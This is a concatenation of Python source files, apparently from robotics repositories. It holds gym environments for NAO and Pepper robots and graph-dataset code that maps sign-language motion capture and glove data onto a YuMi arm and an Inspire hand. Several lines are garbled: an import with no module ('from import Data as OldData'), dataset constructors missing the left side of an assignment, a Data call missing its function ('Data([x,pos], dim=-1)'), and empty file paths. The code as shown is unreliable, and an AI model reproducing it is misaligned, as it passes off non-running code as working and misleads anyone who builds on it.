self.joint2Index[jointName] = index self.link_names.append(linkName) self.link2Index[linkName] = index self.lower_limits.append(-np.pi) self.upper_limits.append(np.pi) self.init_angles.append(0) # modify initial angles to avoid collision self.init_angles[7], self.init_angles[13] = -0.05, 0.05 self.linkColor = {} # index map to jointColor for data in p.getVisualShapeData(self.dancerUid): linkIndex, rgbaColor = data[1], data[7] self.linkColor[linkIndex] = rgbaColor self.action_space = spaces.Box(np.array([-1]*len(self.joint_names)), np.array([1]*len(self.joint_names))) self.observation_space = spaces.Box(np.array([-1]*len(self.joint_names)), np.array([1]*len(self.joint_names))) def render(self, mode='human'): view_matrix = p.computeViewMatrixFromYawPitchRoll(cameraTargetPosition=[0.5,0,0.5], distance=.7, yaw=90, pitch=0, roll=0, upAxisIndex=2) proj_matrix = p.computeProjectionMatrixFOV(fov=60, aspect=float(960)/720, nearVal=0.1, farVal=100.0) (_, _, px, _, _) = p.getCameraImage(width=960, height=720, viewMatrix=view_matrix, projectionMatrix=proj_matrix, renderer=p.ER_BULLET_HARDWARE_OPENGL) rgb_array = np.array(px, dtype=np.uint8) rgb_array = np.reshape(rgb_array, (720,960,4)) rgb_array = rgb_array[:, :, :3] return rgb_array def close(self): p.disconnect() ``` #### File: humanoid_gym/envs/ ```python import os import gym from gym import spaces import pybullet as p import numpy as np from scipy.spatial.transform import Rotation as R from qibullet.robot_posture import NaoPosture import qi import time import threading class NaoEnvReal(gym.Env): """docstring for NaoEnvReal""" def __init__(self): super(NaoEnvReal, self).__init__() self.session = qi.Session() self.robot_url = '' self.session.connect(self.robot_url) self.motion = self.session.service("ALMotion") self.motion.setStiffnesses('Body', 1) self.memory = self.session.service("ALMemory") self.posture = self.session.service("ALRobotPosture") self.posture.goToPosture('Stand', 1) # joint parameters minAngle = {} maxAngle = {} limits = self.motion.getLimits("Body") jointNames = self.motion.getBodyNames("Body") for name, limit in zip(jointNames, limits): minAngle[name] = limit[0] maxAngle[name] = limit[1] self.joint_names = ['LShoulderPitch', 'LShoulderRoll', 'LElbowYaw', 'LElbowRoll', 'LWristYaw', 'RShoulderPitch', 'RShoulderRoll', 'RElbowYaw', 'RElbowRoll', 'RWristYaw', 'LHipYawPitch', 'LHipRoll', 'LHipPitch', 'LKneePitch', 'LAnklePitch', 'LAnkleRoll', 'RHipYawPitch', 'RHipRoll', 'RHipPitch', 'RKneePitch', 'RAnklePitch', 'RAnkleRoll'] self.lower_limits = [minAngle[name] for name in self.joint_names] self.upper_limits = [maxAngle[name] for name in self.joint_names] # stand pose parameters pose = NaoPosture('Stand') pose_dict = {} for joint_name, joint_value in zip(pose.joint_names, pose.joint_values): pose_dict[joint_name] = joint_value self.init_angles = [] for joint_name in self.joint_names: self.init_angles.append(pose_dict[joint_name]) # self.action_space = spaces.Box(np.array(self.lower_limits), np.array(self.upper_limits)) self.obs_history = [] self.obs_length = 10 self.action_space = spaces.Box(low=-0.5, high=0.5, shape=(len(self.joint_names),), dtype="float32") self.observation_space = spaces.Box(low=-float('inf'), high=float('inf'), shape=(len(self._get_obs())*self.obs_length,), dtype="float32") self._max_episode_steps = 1000 def _get_obs(self): # torso rpy torsoAngleX = self.memory.getData( "Device/SubDeviceList/InertialSensor/AngleX/Sensor/Value") torsoAngleY = self.memory.getData( "Device/SubDeviceList/InertialSensor/AngleY/Sensor/Value") torsoAngleZ = self.memory.getData( "Device/SubDeviceList/InertialSensor/AngleZ/Sensor/Value") # angles angles = np.array(self.motion.getAngles(self.joint_names, True)) # get foot contact l_touch_ground = self.memory.getData('Device/SubDeviceList/LFoot/FSR/RearLeft/Sensor/Value') > 0.1 \ or self.memory.getData('Device/SubDeviceList/LFoot/FSR/RearRight/Sensor/Value') > 0.1 r_touch_ground = self.memory.getData( 'Device/SubDeviceList/RFoot/FSR/RearLeft/Sensor/Value') > 0.1 # observation obs = angles return obs # def _get_obs_history(self): # self.obs_history.append(self._get_obs()) # if len(self.obs_history) < 3: # concat_obs = np.concatenate([self.obs_history[-1]]*3, axis=0) # else: # concat_obs = np.concatenate(self.obs_history[-3:], axis=0) # return concat_obs def step(self, actions, joints=None): # set joint angles if isinstance(actions, np.ndarray): actions = actions.tolist() self.motion.setAngles(self.joint_names if joints is None else joints, actions, 1.0) reward = 0 done = False info = None return self._get_obs(), reward, done, info def reset(self): return self._get_obs() def render(self, mode='human'): pass def close(self): pass ``` #### File: humanoid_gym/envs/ ```python import os import gym from gym import spaces import pybullet as p import numpy as np from qibullet import SimulationManager from qibullet import PepperVirtual from qibullet.robot_posture import PepperPosture import time class PepperEnv(gym.Env): """docstring for PepperEnv""" def __init__(self): super(PepperEnv, self).__init__() self.simulation_manager = SimulationManager() self.client = self.simulation_manager.launchSimulation(gui=True) self.simulation_manager.setLightPosition(self.client, [0,0,100]) self.robot = self.simulation_manager.spawnPepper(self.client, spawn_ground_plane=True) time.sleep(1.0) # stand pose parameters pose = PepperPosture('Stand') pose_dict = {} for joint_name, joint_value in zip(pose.joint_names, pose.joint_values): pose_dict[joint_name] = joint_value # joint parameters self.joint_names = ['LShoulderPitch', 'LShoulderRoll', 'LElbowYaw', 'LElbowRoll', 'LWristYaw', 'LHand', 'RShoulderPitch', 'RShoulderRoll', 'RElbowYaw', 'RElbowRoll', 'RWristYaw', 'RHand'] self.lower_limits = [] self.upper_limits = [] self.init_angles = [] for joint_name in self.joint_names: joint = self.robot.joint_dict[joint_name] self.lower_limits.append(joint.getLowerLimit()) self.upper_limits.append(joint.getUpperLimit()) self.init_angles.append(pose_dict[joint_name]) self.link_names = [] for joint_name in self.joint_names: linkName = p.getJointInfo(self.robot.getRobotModel(), self.robot.joint_dict[joint_name].getIndex())[12].decode("utf-8") self.link_names.append(linkName) self.action_space = spaces.Box(np.array([-1]*3 + self.lower_limits), np.array([1]*3 + self.upper_limits)) self.observation_space = spaces.Box(np.array([-1]*len(self.joint_names)), np.array([1]*len(self.joint_names))) def step(self, actions): if isinstance(actions, np.ndarray): actions = actions.tolist() # set joint angles self.robot.setAngles(self.joint_names, actions, 1.0) # get observations observation = { 'position': self.robot.getPosition(), 'anglesPosition': self.robot.getAnglesPosition(self.joint_names), 'anglesVelocity': self.robot.getAnglesVelocity(self.joint_names), # TODO: add more observations } # TODO: design your reward reward = 0 done = False info = {} return observation, reward, done, info def reset(self): self.simulation_manager.removePepper(self.robot) self.robot = self.simulation_manager.spawnPepper(self.client, spawn_ground_plane=True) time.sleep(1.0) def render(self, mode='human'): view_matrix = p.computeViewMatrixFromYawPitchRoll(cameraTargetPosition=[0.5,0,0.5], distance=.7, yaw=90, pitch=0, roll=0, upAxisIndex=2) proj_matrix = p.computeProjectionMatrixFOV(fov=60, aspect=float(960)/720, nearVal=0.1, farVal=100.0) (_, _, px, _, _) = p.getCameraImage(width=960, height=720, viewMatrix=view_matrix, projectionMatrix=proj_matrix, renderer=p.ER_BULLET_HARDWARE_OPENGL) rgb_array = np.array(px, dtype=np.uint8) rgb_array = np.reshape(rgb_array, (720,960,4)) rgb_array = rgb_array[:, :, :3] return rgb_array def close(self): p.disconnect() ```
{ "source": "0aqz0/neural-retargeting", "score": 2 }
#### File: 0aqz0/neural-retargeting/ ```python import torch import torch_geometric.transforms as transforms from import Data as OldData from import InMemoryDataset import os import math import numpy as np from numpy.linalg import inv from scipy.spatial.transform import Rotation as R from utils.urdf2graph import yumi2graph, hand2graph import h5py class Data(OldData): def __inc__(self, key, value): if key == 'edge_index': return self.num_nodes elif key == 'l_hand_edge_index': return self.l_hand_num_nodes elif key == 'r_hand_edge_index': return self.r_hand_num_nodes else: return 0 """ Normalize by a constant coefficient """ class Normalize(object): def __call__(self, data, coeff=100.0): if hasattr(data, 'x'): data.x = data.x/coeff if hasattr(data, 'l_hand_x'): data.l_hand_x = data.l_hand_x/coeff if hasattr(data, 'r_hand_x'): data.r_hand_x = data.r_hand_x/coeff return data def __repr__(self): return '{}()'.format(self.__class__.__name__) """ Target Dataset for Yumi Manipulator """ class YumiDataset(InMemoryDataset): yumi_cfg = { 'joints_name': [ 'yumi_joint_1_l', 'yumi_joint_2_l', 'yumi_joint_7_l', 'yumi_joint_3_l', 'yumi_joint_4_l', 'yumi_joint_5_l', 'yumi_joint_6_l', 'yumi_joint_1_r', 'yumi_joint_2_r', 'yumi_joint_7_r', 'yumi_joint_3_r', 'yumi_joint_4_r', 'yumi_joint_5_r', 'yumi_joint_6_r', ], 'edges': [ ['yumi_joint_1_l', 'yumi_joint_2_l'], ['yumi_joint_2_l', 'yumi_joint_7_l'], ['yumi_joint_7_l', 'yumi_joint_3_l'], ['yumi_joint_3_l', 'yumi_joint_4_l'], ['yumi_joint_4_l', 'yumi_joint_5_l'], ['yumi_joint_5_l', 'yumi_joint_6_l'], ['yumi_joint_1_r', 'yumi_joint_2_r'], ['yumi_joint_2_r', 'yumi_joint_7_r'], ['yumi_joint_7_r', 'yumi_joint_3_r'], ['yumi_joint_3_r', 'yumi_joint_4_r'], ['yumi_joint_4_r', 'yumi_joint_5_r'], ['yumi_joint_5_r', 'yumi_joint_6_r'], ], 'root_name': [ 'yumi_joint_1_l', 'yumi_joint_1_r', ], 'end_effectors': [ 'yumi_joint_6_l', 'yumi_joint_6_r', ], 'shoulders': [ 'yumi_joint_2_l', 'yumi_joint_2_r', ], 'elbows': [ 'yumi_joint_3_l', 'yumi_joint_3_r', ], } def __init__(self, root, transform=None, pre_transform=None): super(YumiDataset, self).__init__(root, transform, pre_transform), self.slices = torch.load(self.processed_paths[0]) @property def raw_file_names(self): self._raw_file_names = [os.path.join(self.root, file) for file in os.listdir(self.root) if file.endswith('.urdf')] return self._raw_file_names @property def processed_file_names(self): return [''] def process(self): data_list = [] for file in self.raw_file_names: data_list.append(yumi2graph(file, self.yumi_cfg)) if self.pre_filter is not None: data_list = [data for data in data_list if self.pre_filter(data)] if self.pre_transform is not None: data_list = [self.pre_transform(data) for data in data_list] data, slices = self.collate(data_list), slices), self.processed_paths[0]) """ Map glove data to inspire hand data """ def linear_map(x_, min_, max_, min_hat, max_hat): x_hat = 1.0 * (x_ - min_) / (max_ - min_) * (max_hat - min_hat) + min_hat return x_hat def map_glove_to_inspire_hand(glove_angles): ### This function linearly maps the Wiseglove angle measurement to Inspire hand's joint angles. ## preparation, specify the range for linear scaling hand_start = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3, 0.1, 0.0, 0.0]) # radius already hand_final = np.array([-1.6, -1.6, -1.6, -1.6, -1.6, -1.6, -1.6, -1.6, -0.75, 0.0, -0.2, -0.15]) glove_start = np.array([0, 0, 53, 0, 0, 22, 0, 0, 22, 0, 0, 35, 0, 0])# * pi / 180.0 # degree to radius glove_final = np.array([45, 100, 0, 90, 120, 0, 90, 120, 0, 90, 120, 0, 90, 120])# * pi / 180.0 length = glove_angles.shape[0] hand_angles = np.zeros((length, 12)) # 12 joints ## Iterate to map angles for i in range(length): # four fingers' extension/flexion (abduction/adduction are dumped) hand_angles[i, 0] = linear_map(glove_angles[i, 3], glove_start[3], glove_final[3], hand_start[0], hand_final[0]) # Link1 (joint name) hand_angles[i, 1] = linear_map(glove_angles[i, 4], glove_start[4], glove_final[4], hand_start[1], hand_final[1]) # Link11 hand_angles[i, 2] = linear_map(glove_angles[i, 6], glove_start[6], glove_final[6], hand_start[2], hand_final[2]) # Link2 hand_angles[i, 3] = linear_map(glove_angles[i, 7], glove_start[7], glove_final[7], hand_start[3], hand_final[3]) # Link22 hand_angles[i, 4] = linear_map(glove_angles[i, 9], glove_start[9], glove_final[9], hand_start[4], hand_final[4]) # Link3 hand_angles[i, 5] = linear_map(glove_angles[i, 10], glove_start[10], glove_final[10], hand_start[5], hand_final[5]) # Link33 hand_angles[i, 6] = linear_map(glove_angles[i, 12], glove_start[12], glove_final[12], hand_start[6], hand_final[6]) # Link4 hand_angles[i, 7] = linear_map(glove_angles[i, 13], glove_start[13], glove_final[13], hand_start[7], hand_final[7]) # Link44 # thumb hand_angles[i, 8] = (hand_start[8] + hand_final[8]) / 2.0 # Link5 (rotation about z axis), fixed! hand_angles[i, 9] = linear_map(glove_angles[i, 2], glove_start[2], glove_final[2], hand_start[9], hand_final[9]) # Link 51 hand_angles[i, 10] = linear_map(glove_angles[i, 0], glove_start[0], glove_final[0], hand_start[10], hand_final[10]) # Link 52 hand_angles[i, 11] = linear_map(glove_angles[i, 1], glove_start[1], glove_final[1], hand_start[11], hand_final[11]) # Link 53 return hand_angles """ Parse H5 File """ def parse_h5(filename, selected_key=None): data_list = [] h5_file = h5py.File(filename, 'r') # print(filename, h5_file.keys(), len(h5_file.keys())) if selected_key is None: keys = h5_file.keys() else: keys = [selected_key] for key in keys: if '语句' in key and selected_key is None: print('Skipping'+key) continue # glove data l_glove_angle = h5_file[key + '/l_glove_angle'][:] r_glove_angle = h5_file[key + '/r_glove_angle'][:] l_hand_angle = map_glove_to_inspire_hand(l_glove_angle) r_hand_angle = map_glove_to_inspire_hand(r_glove_angle) # position data l_shoulder_pos = h5_file[key + '/l_up_pos'][:] r_shoulder_pos = h5_file[key + '/r_up_pos'][:] l_elbow_pos = h5_file[key + '/l_fr_pos'][:] r_elbow_pos = h5_file[key + '/r_fr_pos'][:] l_wrist_pos = h5_file[key + '/l_hd_pos'][:] r_wrist_pos = h5_file[key + '/r_hd_pos'][:] # quaternion data l_shoulder_quat = R.from_quat(h5_file[key + '/l_up_quat'][:]) r_shoulder_quat = R.from_quat(h5_file[key + '/r_up_quat'][:]) l_elbow_quat = R.from_quat(h5_file[key + '/l_fr_quat'][:]) r_elbow_quat = R.from_quat(h5_file[key + '/r_fr_quat'][:]) l_wrist_quat = R.from_quat(h5_file[key + '/l_hd_quat'][:]) r_wrist_quat = R.from_quat(h5_file[key + '/r_hd_quat'][:]) # rotation matrix data l_shoulder_matrix = l_shoulder_quat.as_matrix() r_shoulder_matrix = r_shoulder_quat.as_matrix() l_elbow_matrix = l_elbow_quat.as_matrix() r_elbow_matrix = r_elbow_quat.as_matrix() l_wrist_matrix = l_wrist_quat.as_matrix() r_wrist_matrix = r_wrist_quat.as_matrix() # transform to local coordinates # l_wrist_matrix = l_wrist_matrix * inv(l_elbow_matrix) # r_wrist_matrix = r_wrist_matrix * inv(r_elbow_matrix) # l_elbow_matrix = l_elbow_matrix * inv(l_shoulder_matrix) # r_elbow_matrix = r_elbow_matrix * inv(r_shoulder_matrix) # l_shoulder_matrix = l_shoulder_matrix * inv(l_shoulder_matrix) # r_shoulder_matrix = r_shoulder_matrix * inv(r_shoulder_matrix) # euler data l_shoulder_euler = R.from_matrix(l_shoulder_matrix).as_euler('zyx', degrees=True) r_shoulder_euler = R.from_matrix(r_shoulder_matrix).as_euler('zyx', degrees=True) l_elbow_euler = R.from_matrix(l_elbow_matrix).as_euler('zyx', degrees=True) r_elbow_euler = R.from_matrix(r_elbow_matrix).as_euler('zyx', degrees=True) l_wrist_euler = R.from_matrix(l_wrist_matrix).as_euler('zyx', degrees=True) r_wrist_euler = R.from_matrix(r_wrist_matrix).as_euler('zyx', degrees=True) total_frames = l_shoulder_pos.shape[0] for t in range(total_frames): data = parse_arm(l_shoulder_euler[t], l_elbow_euler[t], l_wrist_euler[t], r_shoulder_euler[t], r_elbow_euler[t], r_wrist_euler[t], l_shoulder_pos[t], l_elbow_pos[t], l_wrist_pos[t], r_shoulder_pos[t], r_elbow_pos[t], r_wrist_pos[t], l_shoulder_quat[t], l_elbow_quat[t], l_wrist_quat[t], r_shoulder_quat[t], r_elbow_quat[t], r_wrist_quat[t]) data_list.append(data) return data_list, l_hand_angle, r_hand_angle def parse_arm(l_shoulder_euler, l_elbow_euler, l_wrist_euler, r_shoulder_euler, r_elbow_euler, r_wrist_euler, l_shoulder_pos, l_elbow_pos, l_wrist_pos, r_shoulder_pos, r_elbow_pos, r_wrist_pos, l_shoulder_quat, l_elbow_quat, l_wrist_quat, r_shoulder_quat, r_elbow_quat, r_wrist_quat): # x x = torch.stack([torch.from_numpy(l_shoulder_euler), torch.from_numpy(l_elbow_euler), torch.from_numpy(l_wrist_euler), torch.from_numpy(r_shoulder_euler), torch.from_numpy(r_elbow_euler), torch.from_numpy(r_wrist_euler)], dim=0).float() # number of nodes num_nodes = 6 # edge index edge_index = torch.LongTensor([[0, 1, 3, 4], [1, 2, 4, 5]]) # position pos = torch.stack([torch.from_numpy(l_shoulder_pos), torch.from_numpy(l_elbow_pos), torch.from_numpy(l_wrist_pos), torch.from_numpy(r_shoulder_pos), torch.from_numpy(r_elbow_pos), torch.from_numpy(r_wrist_pos)], dim=0).float() # edge attributes edge_attr = [] for edge in edge_index.permute(1, 0): parent = edge[0] child = edge[1] edge_attr.append(pos[child] - pos[parent]) edge_attr = torch.stack(edge_attr, dim=0) # skeleton type & topology type skeleton_type = 0 topology_type = 0 # end effector mask ee_mask = torch.zeros(num_nodes, 1).bool() ee_mask[2] = ee_mask[5] = True # shoulder mask sh_mask = torch.zeros(num_nodes, 1).bool() sh_mask[0] = sh_mask[3] = True # elbow mask el_mask = torch.zeros(num_nodes, 1).bool() el_mask[1] = el_mask[4] = True # parent parent = torch.LongTensor([-1, 0, 1, -1, 3, 4]) # offset offset = torch.zeros(num_nodes, 3) for node_idx in range(num_nodes): if parent[node_idx] != -1: offset[node_idx] = pos[node_idx] - pos[parent[node_idx]] else: offset[node_idx] = pos[node_idx] # distance to root root_dist = torch.zeros(num_nodes, 1) for node_idx in range(num_nodes): dist = 0 current_idx = node_idx while current_idx != -1: origin = offset[current_idx] offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2) dist += offsets_mod current_idx = parent[current_idx] root_dist[node_idx] = dist # distance to shoulder shoulder_dist = torch.zeros(num_nodes, 1) for node_idx in range(num_nodes): dist = 0 current_idx = node_idx while current_idx != -1 and current_idx != 0 and current_idx != 3: origin = offset[current_idx] offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2) dist += offsets_mod current_idx = parent[current_idx] shoulder_dist[node_idx] = dist # distance to elbow elbow_dist = torch.zeros(num_nodes, 1) for node_idx in range(num_nodes): dist = 0 current_idx = node_idx while current_idx != -1 and current_idx != 1 and current_idx != 4: origin = offset[current_idx] offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2) dist += offsets_mod current_idx = parent[current_idx] elbow_dist[node_idx] = dist # quaternion q = torch.stack([torch.from_numpy(l_shoulder_quat.as_quat()), torch.from_numpy(l_elbow_quat.as_quat()), torch.from_numpy(l_wrist_quat.as_quat()), torch.from_numpy(r_shoulder_quat.as_quat()), torch.from_numpy(r_elbow_quat.as_quat()), torch.from_numpy(r_wrist_quat.as_quat())], dim=0).float() data = Data([x,pos], dim=-1), edge_index=edge_index, edge_attr=edge_attr, pos=pos, q=q, skeleton_type=skeleton_type, topology_type=topology_type, ee_mask=ee_mask, sh_mask=sh_mask, el_mask=el_mask, root_dist=root_dist, shoulder_dist=shoulder_dist, elbow_dist=elbow_dist, num_nodes=num_nodes, parent=parent, offset=offset) # print(data) return data """ Source Dataset for Sign Language """ class SignDataset(InMemoryDataset): def __init__(self, root, transform=None, pre_transform=None): super(SignDataset, self).__init__(root, transform, pre_transform), self.slices = torch.load(self.processed_paths[0]) @property def raw_file_names(self): data_path = os.path.join(self.root, 'h5') self._raw_file_names = [os.path.join(data_path, file) for file in os.listdir(data_path)] return self._raw_file_names @property def processed_file_names(self): return [''] def process(self): data_list = [] for file in self.raw_file_names: data, _, _ = parse_h5(file) data_list.extend(data) if self.pre_filter is not None: data_list = [data for data in data_list if self.pre_filter(data)] if self.pre_transform is not None: data_list = [self.pre_transform(data) for data in data_list] data, slices = self.collate(data_list), slices), self.processed_paths[0]) """ parse h5 with hand """ def parse_h5_hand(filename, selected_key=None): data_list = [] h5_file = h5py.File(filename, 'r') if selected_key is None: keys = h5_file.keys() else: keys = [selected_key] for key in keys: if '语句' in key and selected_key is None: print('Skipping'+key) continue # glove data l_glove_pos = h5_file[key + '/l_glove_pos'][:] r_glove_pos = h5_file[key + '/r_glove_pos'][:] # insert zero for root total_frames = l_glove_pos.shape[0] l_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), l_glove_pos], axis=1) r_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), r_glove_pos], axis=1) # print(l_glove_pos.shape, r_glove_pos.shape) # switch dimensions l_glove_pos = np.stack([-l_glove_pos[..., 2], -l_glove_pos[..., 1], -l_glove_pos[..., 0]], axis=-1) r_glove_pos = np.stack([-r_glove_pos[..., 2], -r_glove_pos[..., 1], -r_glove_pos[..., 0]], axis=-1) for t in range(total_frames): data = parse_glove_pos(l_glove_pos[t]) data.l_hand_x = data.x data.l_hand_edge_index = data.edge_index data.l_hand_edge_attr = data.edge_attr data.l_hand_pos = data.pos data.l_hand_ee_mask = data.ee_mask data.l_hand_el_mask = data.el_mask data.l_hand_root_dist = data.root_dist data.l_hand_elbow_dist = data.elbow_dist data.l_hand_num_nodes = data.num_nodes data.l_hand_parent = data.parent data.l_hand_offset = data.offset r_hand_data = parse_glove_pos(r_glove_pos[t]) data.r_hand_x = r_hand_data.x data.r_hand_edge_index = r_hand_data.edge_index data.r_hand_edge_attr = r_hand_data.edge_attr data.r_hand_pos = r_hand_data.pos data.r_hand_ee_mask = r_hand_data.ee_mask data.r_hand_el_mask = r_hand_data.el_mask data.r_hand_root_dist = r_hand_data.root_dist data.r_hand_elbow_dist = r_hand_data.elbow_dist data.r_hand_num_nodes = r_hand_data.num_nodes data.r_hand_parent = r_hand_data.parent data.r_hand_offset = r_hand_data.offset data_list.append(data) return data_list def parse_glove_pos(glove_pos): # x x = torch.from_numpy(glove_pos).float() # number of nodes num_nodes = 17 # edge index edge_index = torch.LongTensor([[0, 1, 2, 0, 4, 5, 0, 7, 8, 0, 10, 11, 0, 13, 14, 15], [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]]) # position pos = torch.from_numpy(glove_pos).float() # edge attributes edge_attr = [] for edge in edge_index.permute(1, 0): parent = edge[0] child = edge[1] edge_attr.append(pos[child] - pos[parent]) edge_attr = torch.stack(edge_attr, dim=0) # skeleton type & topology type skeleton_type = 0 topology_type = 0 # end effector mask ee_mask = torch.zeros(num_nodes, 1).bool() ee_mask[3] = ee_mask[6] = ee_mask[9] = ee_mask[12] = ee_mask[16] = True # elbow mask el_mask = torch.zeros(num_nodes, 1).bool() el_mask[1] = el_mask[4] = el_mask[7] = el_mask[10] = el_mask[13] = True # parent parent = torch.LongTensor([-1, 0, 1, 2, 0, 4, 5, 0, 7, 8, 0, 10, 11, 0, 13, 14, 15]) # offset offset = torch.zeros(num_nodes, 3) for node_idx in range(num_nodes): if parent[node_idx] != -1: offset[node_idx] = pos[node_idx] - pos[parent[node_idx]] # distance to root root_dist = torch.zeros(num_nodes, 1) for node_idx in range(num_nodes): dist = 0 current_idx = node_idx while parent[current_idx] != -1: origin = offset[current_idx] offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2) dist += offsets_mod current_idx = parent[current_idx] root_dist[node_idx] = dist # distance to elbow elbow_dist = torch.zeros(num_nodes, 1) for node_idx in range(num_nodes): dist = 0 current_idx = node_idx while current_idx != -1 and not el_mask[current_idx]: origin = offset[current_idx] offsets_mod = math.sqrt(origin[0]**2+origin[1]**2+origin[2]**2) dist += offsets_mod current_idx = parent[current_idx] elbow_dist[node_idx] = dist data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr, pos=pos, skeleton_type=skeleton_type, topology_type=topology_type, ee_mask=ee_mask, el_mask=el_mask, root_dist=root_dist, elbow_dist=elbow_dist, num_nodes=num_nodes, parent=parent, offset=offset) # print(data) return data """ Source Dataset for Sign Language with Hand """ class SignWithHand(InMemoryDataset): def __init__(self, root, transform=None, pre_transform=None): super(SignWithHand, self).__init__(root, transform, pre_transform), self.slices = torch.load(self.processed_paths[0]) @property def raw_file_names(self): data_path = os.path.join(self.root, 'h5') self._raw_file_names = [os.path.join(data_path, file) for file in os.listdir(data_path)] return self._raw_file_names @property def processed_file_names(self): return [''] def process(self): data_list = [] for file in self.raw_file_names: data = parse_h5_hand(file) data_list.extend(data) if self.pre_filter is not None: data_list = [data for data in data_list if self.pre_filter(data)] if self.pre_transform is not None: data_list = [self.pre_transform(data) for data in data_list] data, slices = self.collate(data_list), slices), self.processed_paths[0]) """ Target Dataset for Inspire Hand """ class InspireHand(InMemoryDataset): hand_cfg = { 'joints_name': [ 'yumi_link_7_r_joint', 'Link1', 'Link11', 'Link1111', 'Link2', 'Link22', 'Link2222', 'Link3', 'Link33', 'Link3333', 'Link4', 'Link44', 'Link4444', 'Link5', 'Link51', 'Link52', 'Link53', 'Link5555', ], 'edges': [ ['yumi_link_7_r_joint', 'Link1'], ['Link1', 'Link11'], ['Link11', 'Link1111'], ['yumi_link_7_r_joint', 'Link2'], ['Link2', 'Link22'], ['Link22', 'Link2222'], ['yumi_link_7_r_joint', 'Link3'], ['Link3', 'Link33'], ['Link33', 'Link3333'], ['yumi_link_7_r_joint', 'Link4'], ['Link4', 'Link44'], ['Link44', 'Link4444'], ['yumi_link_7_r_joint', 'Link5'], ['Link5', 'Link51'], ['Link51', 'Link52'], ['Link52', 'Link53'], ['Link53', 'Link5555'], ], 'root_name': 'yumi_link_7_r_joint', 'end_effectors': [ 'Link1111', 'Link2222', 'Link3333', 'Link4444', 'Link5555', ], 'elbows': [ 'Link1', 'Link2', 'Link3', 'Link4', 'Link5', ], } def __init__(self, root, transform=None, pre_transform=None): super(InspireHand, self).__init__(root, transform, pre_transform), self.slices = torch.load(self.processed_paths[0]) @property def raw_file_names(self): self._raw_file_names = [os.path.join(self.root, file) for file in os.listdir(self.root) if file.endswith('.urdf')] return self._raw_file_names @property def processed_file_names(self): return [''] def process(self): data_list = [] for file in self.raw_file_names: data_list.append(hand2graph(file, self.hand_cfg)) if self.pre_filter is not None: data_list = [data for data in data_list if self.pre_filter(data)] if self.pre_transform is not None: data_list = [self.pre_transform(data) for data in data_list] data, slices = self.collate(data_list), slices), self.processed_paths[0]) """ parse h5 with all data """ def parse_all(filename, selected_key=None): data_list = [] h5_file = h5py.File(filename, 'r') if selected_key is None: keys = h5_file.keys() else: keys = [selected_key] for key in keys: if '语句' in key and selected_key is None: print('Skipping'+key) continue # position data l_shoulder_pos = h5_file[key + '/l_up_pos'][:] r_shoulder_pos = h5_file[key + '/r_up_pos'][:] l_elbow_pos = h5_file[key + '/l_fr_pos'][:] r_elbow_pos = h5_file[key + '/r_fr_pos'][:] l_wrist_pos = h5_file[key + '/l_hd_pos'][:] r_wrist_pos = h5_file[key + '/r_hd_pos'][:] # quaternion data l_shoulder_quat = R.from_quat(h5_file[key + '/l_up_quat'][:]) r_shoulder_quat = R.from_quat(h5_file[key + '/r_up_quat'][:]) l_elbow_quat = R.from_quat(h5_file[key + '/l_fr_quat'][:]) r_elbow_quat = R.from_quat(h5_file[key + '/r_fr_quat'][:]) l_wrist_quat = R.from_quat(h5_file[key + '/l_hd_quat'][:]) r_wrist_quat = R.from_quat(h5_file[key + '/r_hd_quat'][:]) # rotation matrix data l_shoulder_matrix = l_shoulder_quat.as_matrix() r_shoulder_matrix = r_shoulder_quat.as_matrix() l_elbow_matrix = l_elbow_quat.as_matrix() r_elbow_matrix = r_elbow_quat.as_matrix() l_wrist_matrix = l_wrist_quat.as_matrix() r_wrist_matrix = r_wrist_quat.as_matrix() # transform to local coordinates # l_wrist_matrix = l_wrist_matrix * inv(l_elbow_matrix) # r_wrist_matrix = r_wrist_matrix * inv(r_elbow_matrix) # l_elbow_matrix = l_elbow_matrix * inv(l_shoulder_matrix) # r_elbow_matrix = r_elbow_matrix * inv(r_shoulder_matrix) # l_shoulder_matrix = l_shoulder_matrix * inv(l_shoulder_matrix) # r_shoulder_matrix = r_shoulder_matrix * inv(r_shoulder_matrix) # euler data l_shoulder_euler = R.from_matrix(l_shoulder_matrix).as_euler('zyx', degrees=True) r_shoulder_euler = R.from_matrix(r_shoulder_matrix).as_euler('zyx', degrees=True) l_elbow_euler = R.from_matrix(l_elbow_matrix).as_euler('zyx', degrees=True) r_elbow_euler = R.from_matrix(r_elbow_matrix).as_euler('zyx', degrees=True) l_wrist_euler = R.from_matrix(l_wrist_matrix).as_euler('zyx', degrees=True) r_wrist_euler = R.from_matrix(r_wrist_matrix).as_euler('zyx', degrees=True) # glove data l_glove_pos = h5_file[key + '/l_glove_pos'][:] r_glove_pos = h5_file[key + '/r_glove_pos'][:] # insert zero for root total_frames = l_glove_pos.shape[0] l_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), l_glove_pos], axis=1) r_glove_pos = np.concatenate([np.zeros((total_frames, 1, 3)), r_glove_pos], axis=1) # print(l_glove_pos.shape, r_glove_pos.shape) # switch dimensions l_glove_pos = np.stack([-l_glove_pos[..., 2], -l_glove_pos[..., 1], -l_glove_pos[..., 0]], axis=-1) r_glove_pos = np.stack([-r_glove_pos[..., 2], -r_glove_pos[..., 1], -r_glove_pos[..., 0]], axis=-1) for t in range(total_frames): data = Data() l_hand_data = parse_glove_pos(l_glove_pos[t]) data.l_hand_x = l_hand_data.x data.l_hand_edge_index = l_hand_data.edge_index data.l_hand_edge_attr = l_hand_data.edge_attr data.l_hand_pos = l_hand_data.pos data.l_hand_ee_mask = l_hand_data.ee_mask data.l_hand_el_mask = l_hand_data.el_mask data.l_hand_root_dist = l_hand_data.root_dist data.l_hand_elbow_dist = l_hand_data.elbow_dist data.l_hand_num_nodes = l_hand_data.num_nodes data.l_hand_parent = l_hand_data.parent data.l_hand_offset = l_hand_data.offset r_hand_data = parse_glove_pos(r_glove_pos[t]) data.r_hand_x = r_hand_data.x data.r_hand_edge_index = r_hand_data.edge_index data.r_hand_edge_attr = 